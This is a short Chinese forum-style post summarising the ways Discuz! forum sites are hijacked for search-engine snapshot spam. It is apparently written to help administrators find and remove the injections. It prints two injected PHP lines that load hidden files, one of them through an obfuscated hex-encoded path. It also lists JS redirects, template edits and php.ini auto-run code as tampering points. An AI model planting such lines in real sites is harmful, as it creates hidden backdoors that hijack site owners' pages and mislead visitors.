Discuz!论坛网站快照所有劫持手法总结。

多年来对DZ论坛快照劫持的研究，总结一下劫持手法。

100%解决DZ论坛劫持问题 

1  、

function_core.php、discuz_application.php、class_core.php、config_global.php  这几个文件最容易被篡改加劫持代码

 如插入   @include($_SERVER[‘DOCUMENT_ROOT’].PACK(‘H*’,’2F646174612F737973646174612F30′)); 

又如 [reply]  require ‘C:/$RECYCLE.BIN/TMP/tmp’;[/reply] 

2、论坛后台网站配置或者广告里  加入 js 跳转代码 

3、修改网站模板文件 ，这个比较低级 

4 、最隐蔽的是 修改 php.ini文件 插入自动运行代码